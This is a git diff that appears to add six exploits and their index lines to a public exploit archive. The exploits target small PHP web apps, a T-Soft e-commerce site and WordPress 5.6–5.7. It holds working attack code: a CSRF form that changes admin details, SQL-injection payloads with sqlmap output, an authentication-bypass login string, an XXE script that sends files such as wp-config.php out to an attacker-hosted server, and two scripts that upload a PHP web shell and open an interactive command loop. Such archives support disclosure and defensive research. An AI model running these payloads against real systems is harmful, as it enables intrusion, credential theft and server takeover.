diff --git a/exploits/multiple/webapps/50302.txt b/exploits/multiple/webapps/50302.txt new file mode 100644 index 000000000..c7daf3fca --- /dev/null +++ b/exploits/multiple/webapps/50302.txt @@ -0,0 +1,74 @@ +# Exploit Title: T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF) +# Exploit Author: Alperen Ergel +# Software Homepage: https://www.tsoft.com.tr/ +# Version : v4 +# Tested on: Kali Linux (2021.4) / xammp +# Category: WebApp +# Google Dork: intext:'T-Soft E-Ticaret Sistemleriyle Hazırlanmıştır.'" +# Date: 2021-08-15 +######## Description ######## +# +# Attacker can change admin informaiton +# +# +######## Proof of Concept ######## + +POST /srv/service/admin/updateuserinfo HTTP/1.1 + +Host: localhost + +Cookie: lang=tr; PHPSESSID=f2904b66de6c0e7ac0d4a9707b9f978c; rest1SupportUser=0; countryCode=TR; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; webpush=1; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: application/json, text/javascript, */*; q=0.01 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded + +X-Requested-With: XMLHttpRequest + +Content-Length: 74 + +Origin: http://localhost + +Referer: http://localhost/Y/ + +Te: trailers + +Connection: close + + + +firstName=Victim&lastName=victim&email=victim%40mail.com&phone=12584368595 + + + + +####### EXPLOIT ################## + + + + + + +
+ + + + + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/50303.txt b/exploits/php/webapps/50303.txt new file mode 100644 index 000000000..641a3d56b --- /dev/null +++ b/exploits/php/webapps/50303.txt @@ -0,0 +1,43 @@ +# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated) +# Exploit Author: Erwin Krazek (Nero) +# Date: 17/09/2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip +# Vendor: oretnom23 +# Version: v1.0 +# Tested on: Linux, Apache, Mysql +# Exploit Description: +Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack. + +# Vulnerable Code +In search.php on line 28 +$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows; + +Sqlmap command: +sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch + +Output: +--- +Parameter: search (GET) +Type: boolean-based blind +Title: OR boolean-based blind - WHERE or HAVING clause (NOT) +Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu + +Type: time-based blind +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac + +Type: UNION query +Title: Generic UNION query (NULL) - 14 columns +Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- - +--- +[17:33:38] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Debian +web application technology: Apache 2.4.46, PHP +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) +[17:33:38] [INFO] fetching database names +available databases [4]: +[*] church_db +[*] information_schema +[*] mysql +[*] performance_schema \ No newline at end of file diff --git a/exploits/php/webapps/50304.sh b/exploits/php/webapps/50304.sh new file mode 100755 index 000000000..ad2671a0c --- /dev/null +++ b/exploits/php/webapps/50304.sh @@ -0,0 +1,175 @@ +# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated) +# Date: 16/09/2021 +# Exploit Author: David Utón (M3n0sD0n4ld) +# Vendor Homepage: https://wordpress.com +# Affected Version: WordPress 5.6-5.7 & PHP8 +# Tested on: Linux Ubuntu 18.04.5 LTS +# CVE : CVE-2021-29447 + +#!/bin/bash + +# Author: @David_Uton (m3n0sd0n4ld) +# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST +# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX + + +# Variables +rHost=$1 +username=$2 +password=$3 +readFile=$4 +lHost=$5 + +# Functions +# Logotype +logoType(){ + echo " +===================================== +CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated) +------------------------------------- +@David_Uton (M3n0sD0n4ld) +https://m3n0sd0n4ld.github.io/ +=====================================" +} + +# Create wav malicious +wavCreate(){ + echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav" +} + +# Create xx3.dtd +dtdCreate(){ +cat < xx3.dtd + +" > +EOT +} + +# wav upload +wavUpload(){ +cat < .upload.py +#/usr/bin/env python3 + +import requests, re, sys + +postData = { + 'log':"$username", + 'pwd':"$password", + 'wp-submit':'Log In', + 'redirect_to':'http://$rHost/wp-admin/', + 'testcookie':1 +} + +r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True + +cookies = r.cookies + +print("[+] Getting Wp Nonce ... ") + +res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies) +wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) + +if len(wp_nonce_list) == 0 : + print("[-] Failed to retrieve the _wpnonce") + exit(0) +else : + wp_nonce = wp_nonce_list[0] + print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce) + +print("[+] Uploading the wav file ... ") + +postData = { + 'name': 'payload.wav', + 'action': 'upload-attachment', + '_wpnonce': wp_nonce +} + +wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))} +r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies) +if r_upload.status_code == 200: + image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] + _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] + print('[+] Wav uploaded successfully') +else : + print("[-] Failed to receive a response for uploaded! Try again . \n") + exit(0) +EOT +python3 .upload.py +} + +# Server Sniffer +serverSniffer(){ + statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid) +} + +# Load file and decoder +loadFile(){ + content="http.server.log" + wavUpload + + while : + do + if [[ -s $content ]]; then + echo "[+] Obtaining file information..." + sleep 5s # Increase time if the server is slow + + base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u) + + # Check file exists + echo "" > decode.php + sizeCheck=$(wc -c decode.php | awk '{printf $1}') + if [[ $sizeCheck -gt "46" ]]; then + php decode.php + else + echo "[!] File does not exist or is not allowed to be read." + fi + break + fi + done +} + +# Cleanup +cleanup(){ + kill $(cat http.server.pid) &>/dev/null + rm http.server.log http.server.pid &>/dev/null + rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null +} + + +# Execute +logoType + +# Checking parameters +if [[ $# -ne 5 ]];then + echo "[!] Parameters are missing!!!" + echo "" + echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST" +else + + # Test Connection... + echo "[*] Test connection to WordPress..." + + # WP Auth + authCheck=$(curl -i -s -k -X $'POST' \ + -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'wordpress_test_cookie=WP%20Cookie%20check' \ + --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \ +"http://$rHost/wp-login.php" > .cookies.tmp) + + auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }') + + # Running authentication with WordPress. + + if [[ $auth != "302" ]]; then + echo "[-] Authentication failed ! Check username and password" + else + echo "[+] Authentication successfull!!!" + + # Create wav & dtd file + wavCreate + dtdCreate + serverSniffer + loadFile + cleanup + fi +fi \ No newline at end of file diff --git a/exploits/php/webapps/50305.py b/exploits/php/webapps/50305.py new file mode 100755 index 000000000..61bbd4996 --- /dev/null +++ b/exploits/php/webapps/50305.py @@ -0,0 +1,182 @@ +# Exploit Title: Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated) +# Exploit Author: Abdullah Khawaja (hax.3xploit) +# Date: 2021-09-20 +# Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip +# Version: 2.0 +# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 +# Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. + +# Exploit Details: + +# 1. Access the 'admin/ajax.php', as it does not check for an authenticated user session. +# 2. Set the 'action' parameter of the POST request to 'save_settings'. +# - `ajax.php?action=save_settings` +# 3. Capture request in burp and replace with with following request. + +''' +POST /fos/admin/ajax.php?action=save_settings HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251 +Content-Length: 754 +Origin: http://localhost +Connection: close +Referer: http://localhost/fos/admin/index.php?page=site_settings +Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="name" + +adsa +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="email" + +asdsad@asda.com +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="contact" + +asdsad +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="about" + +asdsad +-----------------------------120025571041714278883588636251 +Content-Disposition: form-data; name="img"; filename="phpinfo.php" +Content-Type: application/octet-stream + + +-----------------------------120025571041714278883588636251-- +''' +# ` Image uploader is renaming your payload using the following function. + # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; + # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler + # and print this function to get the value. e.g: Output: 1632085200 + # concate output with your playload name like this 1632085200_phpinfo.php +# 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET Requests. + +# RCE via executing exploit: + # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py + # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/ + + +import requests, sys, urllib, re +import datetime +from colorama import Fore, Back, Style + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + + + + + +header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL + +print(Style.BRIGHT+" Online Food Ordering System v2.0") +print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) +print(header) + +print(r""" + ______ _______ ________ + ___ //_/__ /_______ ___ _______ ______(_)_____ _ + __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ + _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / + /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ + /___/ + abdullahkhawaja.com + """) + + + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults + +#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + + +#Create a new session +s = requests.Session() + + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + + +def webshell(LINK, session): + try: + WEB_SHELL = LINK+'/assets/img/'+filename + getdir = {'cmd': 'echo %CD%'} + r2 = session.get(WEB_SHELL, params=getdir, verify=False) + status = r2.status_code + if status != 200: + print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) + r2.raise_for_status() + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + while True: + thought = input(term) + command = {'cmd': thought} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print("\r\nExiting.") + sys.exit(-1) + + +#Creating a PHP Web Shell + +phpshell = { + 'img': + ( + 'shell.php', + '', + 'application/octet-stream', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'name':'test', 'email':'info@sample.com', 'contact':'+6948 8542 623','about':'hello world'} + + +def id_generator(): + x = datetime.datetime.now() + date_string = x.strftime("%y-%m-%d %H:%M") + date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") + timestamp = datetime.datetime.timestamp(date) + file = int(timestamp) + final_name = str(file)+'_shell.php' + return final_name + +filename = id_generator() +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data) + +shell_upload = True if("1" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload The PHP Shell!", RESET) + + + +#Executing The Webshell +webshell(LINK, s) \ No newline at end of file diff --git a/exploits/php/webapps/50306.py b/exploits/php/webapps/50306.py new file mode 100755 index 000000000..b40358cd0 --- /dev/null +++ b/exploits/php/webapps/50306.py @@ -0,0 +1,193 @@ +# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Exploit Author: Abdullah Khawaja +# Date: 2021-09-20 +# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip +# Version: 1.0 +# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 +# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. + +# Exploit Details: + +# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session. +# 2. Set the 'f' parameter of the POST request to 'save'. +# - `Users.php?f=save` +# 3. Capture request in burp and replace with with following request. +''' +POST /church_management/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550 +Content-Length: 859 +Origin: http://localhost +Connection: close +Referer: http://localhost/church_management/admin/?page=user +Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="id" + +1 +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="firstname" + +Adminstrator +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="lastname" + +Admin +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="username" + +admin +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="password" + + +-----------------------------91105564325608762312322546550 +Content-Disposition: form-data; name="img"; filename="phpinfo.php" +Content-Type: application/octet-stream + + +-----------------------------91105564325608762312322546550-- + +''' +# ` Image uploader is renaming your payload using the following function. + # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; + # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler + # and print this function to get the value. e.g: Output: 1632085200 + # concate output with your playload name like this 1632085200_phpinfo.php +# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests. + +# RCE via executing exploit: + # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py + # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/ + + +import requests, sys, urllib, re +import datetime +from colorama import Fore, Back, Style + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL + +print(Style.BRIGHT+" Church Management System v1.0") +print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) +print(header) + +print(r""" + + + .----------. + .-''-. / / + . __ __ ___ .' .-. ) / ______.' + .'| | |/ `.' `. / .' / / / /_ + .' | | .-. .-. ' (_/ / / / '''--. +< | __ __ | | | | | | ,.----------. / / '___ `. + | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. | + | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) | + | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' / + | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'` + | | \ \ / / | |_/ / | |_ / /.-'_.' '------''' + ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.' +'------' '---'`--' `" `--' `" ( _.-' + + abdullahkhawaja.com + """) + + + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults +#Create a new session +#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + + + +s = requests.Session() + + + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + + +def webshell(LINK, session): + try: + WEB_SHELL = LINK+'uploads/'+filename + getdir = {'cmd': 'echo %CD%'} + r2 = session.get(WEB_SHELL, params=getdir, verify=False) + status = r2.status_code + if status != 200: + print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) + r2.raise_for_status() + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + while True: + thought = input(term) + command = {'cmd': thought} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print("\r\nExiting.") + sys.exit(-1) + + +#Creating a PHP Web Shell + +phpshell = { + 'img': + ( + 'shell.php', + '', + 'application/octet-stream', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''} + + +def id_generator(): + x = datetime.datetime.now() + date_string = x.strftime("%y-%m-%d %H:%M") + date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") + timestamp = datetime.datetime.timestamp(date) + file = int(timestamp) + final_name = str(file)+'_shell.php' + return final_name + +filename = id_generator() +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data) + +shell_upload = True if("Undefined index: id in" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload The PHP Shell!", RESET) + + + +#Executing The Webshell +webshell(LINK, s) \ No newline at end of file diff --git a/exploits/php/webapps/50307.txt b/exploits/php/webapps/50307.txt new file mode 100644 index 000000000..8aedae48d --- /dev/null +++ b/exploits/php/webapps/50307.txt @@ -0,0 +1,19 @@ +# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass +# Exploit Author: Prunier Charles-Yves +# Date: September 20, 2021 +# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip +# Tested on: Linux, windows +# Vendor: oretnom23 +# Version: v1.0 + +# Exploit Description: +Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application +allowing the attacker to login with admin acount + + +----- PoC: Authentication Bypass ----- + +Administration Panel: http://localhost/expense_budget/admin/login.php + +Username: admin' or ''=' -- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8791f8482..6b4e46cf0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44420,3 +44420,9 @@ id,file,description,date,author,type,platform,port 50299,exploits/php/webapps/50299.py,"WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass",1970-01-01,0xB455,webapps,php, 50300,exploits/php/webapps/50300.py,"Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,boku,webapps,php, 50301,exploits/php/webapps/50301.txt,"Simple Attendance System 1.0 - Authenticated bypass",1970-01-01,"Abdullah Khawaja",webapps,php, +50302,exploits/multiple/webapps/50302.txt,"T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,multiple, +50303,exploits/php/webapps/50303.txt,"Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)",1970-01-01,"Erwin Krazek",webapps,php, +50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php, +50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, +50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, +50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,